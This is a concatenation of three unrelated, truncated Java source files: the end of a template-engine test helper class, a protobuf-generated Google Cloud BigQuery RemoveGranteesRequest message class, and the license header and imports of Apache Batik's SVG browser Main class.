int[] { 11, 22 }; } public Integer[] getJavaIntegerArray() { return new Integer[] { Integer.valueOf(11), Integer.valueOf(22) }; } public String[] getJavaEmptyStringArray() { return new String[] { }; } public String[][] getJavaStringArrayArray() { return new String[][] { new String[] { "a", "b" }, new String[] { }, new String[] { "c" } }; } public Object[] getJavaObjectArray() { return new Object[] { "a", "b" }; } public TemplateModel getHashAndScalarModel() { return HashAndScalarModel.INSTANCE; } public TemplateModel getBooleanAndScalarModel() { return BooleanAndScalarModel.INSTANCE; } public TemplateModel getAllModels() { return AllTemplateModels.INSTANCE; } public TemplateNumberModel getAdaptedNumber() { return new MyAdapterNumberModel(); } public TemplateNumberModel getWrapperNumber() { return new MyWrapperNumberModel(); } public TemplateBooleanModel getStringAdaptedToBoolean() { return new MyStringAdaptedToBooleanModel(); } public TemplateBooleanModel getStringAdaptedToBoolean2() { return new MyStringAdaptedToBooleanModel2(); } public TemplateBooleanModel getStringWrappedAsBoolean() { return new MyStringWrapperAsBooleanModel(); } public TemplateBooleanModel getBooleanWrappedAsAnotherBoolean() { return new MyBooleanWrapperAsAnotherBooleanModel(); } public String bugReport363(Map<String, ?> fields, List<?> listField) { return "Executed: testMethod(Map fields, List listField) on input: fields=" + fields + " and listField=" + listField; } public String bugReport363(Object... fields) { return "Executed: testMethod(Object... fields) on input: fields=" + TestUtil.arrayToString(fields); } private static class MyAdapterNumberModel implements TemplateNumberModel, AdapterTemplateModel { public Object getAdaptedObject(Class hint) { if (hint == double.class) { return Double.valueOf(123.0001); } else if (hint == Double.class) { return Double.valueOf(123.0002); } else { return Long.valueOf(124L); } } public Number getAsNumber() throws TemplateModelException { return Integer.valueOf(122); } } private static class MyWrapperNumberModel implements TemplateNumberModel, WrapperTemplateModel { public Number getAsNumber() throws TemplateModelException { return Integer.valueOf(122); } public Object getWrappedObject() { return Double.valueOf(123.0001); } } private static class MyStringWrapperAsBooleanModel implements TemplateBooleanModel, WrapperTemplateModel { public Object getWrappedObject() { return "yes"; } public boolean getAsBoolean() throws TemplateModelException { return true; } } private static class MyBooleanWrapperAsAnotherBooleanModel implements TemplateBooleanModel, WrapperTemplateModel { public Object getWrappedObject() { return Boolean.TRUE; } public boolean getAsBoolean() throws TemplateModelException { return false; } } private static class MyStringAdaptedToBooleanModel implements TemplateBooleanModel, AdapterTemplateModel { public Object getAdaptedObject(Class hint) { if (hint != Boolean.class && hint != boolean.class) { return "yes"; } else { return Boolean.TRUE; } } public boolean getAsBoolean() throws TemplateModelException { return false; } } private static class MyStringAdaptedToBooleanModel2 implements TemplateBooleanModel, AdapterTemplateModel { public Object getAdaptedObject(Class hint) { return "yes"; } public boolean getAsBoolean() throws TemplateModelException { return true; } } }
googleapis/google-cloud-java
35,794
java-bigquerydatapolicy/proto-google-cloud-bigquerydatapolicy-v2beta1/src/main/java/com/google/cloud/bigquery/datapolicies/v2beta1/RemoveGranteesRequest.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/bigquery/datapolicies/v2beta1/datapolicy.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.bigquery.datapolicies.v2beta1; /** * * * <pre> * Request message for the RemoveGrantees method. * </pre> * * Protobuf type {@code google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest} */ public final class RemoveGranteesRequest extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) RemoveGranteesRequestOrBuilder { private static final long serialVersionUID = 0L; // Use RemoveGranteesRequest.newBuilder() to construct. private RemoveGranteesRequest(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private RemoveGranteesRequest() { dataPolicy_ = ""; grantees_ = com.google.protobuf.LazyStringArrayList.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new RemoveGranteesRequest(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.bigquery.datapolicies.v2beta1.DataPolicyProto .internal_static_google_cloud_bigquery_datapolicies_v2beta1_RemoveGranteesRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.bigquery.datapolicies.v2beta1.DataPolicyProto .internal_static_google_cloud_bigquery_datapolicies_v2beta1_RemoveGranteesRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest.class, com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest.Builder.class); } public static final int DATA_POLICY_FIELD_NUMBER = 1; @SuppressWarnings("serial") private volatile java.lang.Object dataPolicy_ = ""; /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The dataPolicy. */ @java.lang.Override public java.lang.String getDataPolicy() { java.lang.Object ref = dataPolicy_; if (ref instanceof java.lang.String) { return (java.lang.String) ref; } else { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); dataPolicy_ = s; return s; } } /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for dataPolicy. */ @java.lang.Override public com.google.protobuf.ByteString getDataPolicyBytes() { java.lang.Object ref = dataPolicy_; if (ref instanceof java.lang.String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); dataPolicy_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } public static final int GRANTEES_FIELD_NUMBER = 2; @SuppressWarnings("serial") private com.google.protobuf.LazyStringArrayList grantees_ = com.google.protobuf.LazyStringArrayList.emptyList(); /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return A list containing the grantees. */ public com.google.protobuf.ProtocolStringList getGranteesList() { return grantees_; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The count of grantees. */ public int getGranteesCount() { return grantees_.size(); } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param index The index of the element to return. * @return The grantees at the given index. */ public java.lang.String getGrantees(int index) { return grantees_.get(index); } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param index The index of the value to return. * @return The bytes of the grantees at the given index. */ public com.google.protobuf.ByteString getGranteesBytes(int index) { return grantees_.getByteString(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(dataPolicy_)) { com.google.protobuf.GeneratedMessageV3.writeString(output, 1, dataPolicy_); } for (int i = 0; i < grantees_.size(); i++) { com.google.protobuf.GeneratedMessageV3.writeString(output, 2, grantees_.getRaw(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (!com.google.protobuf.GeneratedMessageV3.isStringEmpty(dataPolicy_)) { size += com.google.protobuf.GeneratedMessageV3.computeStringSize(1, dataPolicy_); } { int dataSize = 0; for (int i = 0; i < grantees_.size(); i++) { dataSize += computeStringSizeNoTag(grantees_.getRaw(i)); } size += dataSize; size += 1 * getGranteesList().size(); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest)) { return super.equals(obj); } com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest other = (com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) obj; if (!getDataPolicy().equals(other.getDataPolicy())) return false; if (!getGranteesList().equals(other.getGranteesList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); hash = (37 * hash) + DATA_POLICY_FIELD_NUMBER; hash = (53 * hash) + getDataPolicy().hashCode(); if (getGranteesCount() > 0) { hash = (37 * hash) + GRANTEES_FIELD_NUMBER; hash = (53 * hash) + getGranteesList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Request message for the RemoveGrantees method. * </pre> * * Protobuf type {@code google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.bigquery.datapolicies.v2beta1.DataPolicyProto .internal_static_google_cloud_bigquery_datapolicies_v2beta1_RemoveGranteesRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.bigquery.datapolicies.v2beta1.DataPolicyProto .internal_static_google_cloud_bigquery_datapolicies_v2beta1_RemoveGranteesRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest.class, com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest.Builder.class); } // Construct using // com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; dataPolicy_ = ""; grantees_ = com.google.protobuf.LazyStringArrayList.emptyList(); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.bigquery.datapolicies.v2beta1.DataPolicyProto .internal_static_google_cloud_bigquery_datapolicies_v2beta1_RemoveGranteesRequest_descriptor; } @java.lang.Override public com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest getDefaultInstanceForType() { return com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest .getDefaultInstance(); } @java.lang.Override public com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest build() { com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest buildPartial() { com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest result = new com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.dataPolicy_ = dataPolicy_; } if (((from_bitField0_ & 0x00000002) != 0)) { grantees_.makeImmutable(); result.grantees_ = grantees_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) { return mergeFrom( (com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest other) { if (other == com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest .getDefaultInstance()) return this; if (!other.getDataPolicy().isEmpty()) { dataPolicy_ = other.dataPolicy_; bitField0_ |= 0x00000001; onChanged(); } if (!other.grantees_.isEmpty()) { if (grantees_.isEmpty()) { grantees_ = other.grantees_; bitField0_ |= 0x00000002; } else { ensureGranteesIsMutable(); grantees_.addAll(other.grantees_); } onChanged(); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { dataPolicy_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { java.lang.String s = input.readStringRequireUtf8(); ensureGranteesIsMutable(); grantees_.add(s); break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object dataPolicy_ = ""; /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The dataPolicy. */ public java.lang.String getDataPolicy() { java.lang.Object ref = dataPolicy_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); dataPolicy_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for dataPolicy. */ public com.google.protobuf.ByteString getDataPolicyBytes() { java.lang.Object ref = dataPolicy_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); dataPolicy_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The dataPolicy to set. * @return This builder for chaining. */ public Builder setDataPolicy(java.lang.String value) { if (value == null) { throw new NullPointerException(); } dataPolicy_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearDataPolicy() { dataPolicy_ = getDefaultInstance().getDataPolicy(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. Resource name of this data policy, in the format of * `projects/{project_number}/locations/{location_id}/dataPolicies/{data_policy_id}`. * </pre> * * <code> * string data_policy = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for dataPolicy to set. * @return This builder for chaining. */ public Builder setDataPolicyBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); dataPolicy_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private com.google.protobuf.LazyStringArrayList grantees_ = com.google.protobuf.LazyStringArrayList.emptyList(); private void ensureGranteesIsMutable() { if (!grantees_.isModifiable()) { grantees_ = new com.google.protobuf.LazyStringArrayList(grantees_); } bitField0_ |= 0x00000002; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return A list containing the grantees. */ public com.google.protobuf.ProtocolStringList getGranteesList() { grantees_.makeImmutable(); return grantees_; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return The count of grantees. */ public int getGranteesCount() { return grantees_.size(); } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param index The index of the element to return. * @return The grantees at the given index. */ public java.lang.String getGrantees(int index) { return grantees_.get(index); } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param index The index of the value to return. * @return The bytes of the grantees at the given index. */ public com.google.protobuf.ByteString getGranteesBytes(int index) { return grantees_.getByteString(index); } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param index The index to set the value at. * @param value The grantees to set. * @return This builder for chaining. */ public Builder setGrantees(int index, java.lang.String value) { if (value == null) { throw new NullPointerException(); } ensureGranteesIsMutable(); grantees_.set(index, value); bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The grantees to add. * @return This builder for chaining. */ public Builder addGrantees(java.lang.String value) { if (value == null) { throw new NullPointerException(); } ensureGranteesIsMutable(); grantees_.add(value); bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param values The grantees to add. * @return This builder for chaining. */ public Builder addAllGrantees(java.lang.Iterable<java.lang.String> values) { ensureGranteesIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, grantees_); bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @return This builder for chaining. */ public Builder clearGrantees() { grantees_ = com.google.protobuf.LazyStringArrayList.emptyList(); bitField0_ = (bitField0_ & ~0x00000002); ; onChanged(); return this; } /** * * * <pre> * Required. IAM principal that should be revoked from Fine Grained Access to * the underlying data goverened by the data policy. The target data policy is * determined by the `data_policy` field. * * Uses the [IAM V2 principal * syntax](https://cloud.google.com/iam/docs/principal-identifiers#v2). * Supported principal types: * * * User * * Group * * Service account * </pre> * * <code>repeated string grantees = 2 [(.google.api.field_behavior) = REQUIRED];</code> * * @param value The bytes of the grantees to add. * @return This builder for chaining. */ public Builder addGranteesBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); ensureGranteesIsMutable(); grantees_.add(value); bitField0_ |= 0x00000002; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) } // @@protoc_insertion_point(class_scope:google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest) private static final com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest(); } public static com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<RemoveGranteesRequest> PARSER = new com.google.protobuf.AbstractParser<RemoveGranteesRequest>() { @java.lang.Override public RemoveGranteesRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<RemoveGranteesRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<RemoveGranteesRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.bigquery.datapolicies.v2beta1.RemoveGranteesRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
apache/xmlgraphics-batik
35,770
batik-svgbrowser/src/main/java/org/apache/batik/apps/svgbrowser/Main.java
/* Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ package org.apache.batik.apps.svgbrowser; import java.awt.BorderLayout; import java.awt.Dimension; import java.awt.Font; import java.awt.event.ActionEvent; import java.io.BufferedReader; import java.io.File; import java.io.FileWriter; import java.io.InputStreamReader; import java.io.IOException; import java.io.Reader; import java.io.UnsupportedEncodingException; import java.io.Writer; import java.net.Authenticator; import java.net.URLDecoder; import java.net.URLEncoder; import java.nio.charset.Charset; import java.util.HashMap; import java.util.LinkedList; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.ResourceBundle; import java.util.StringTokenizer; import 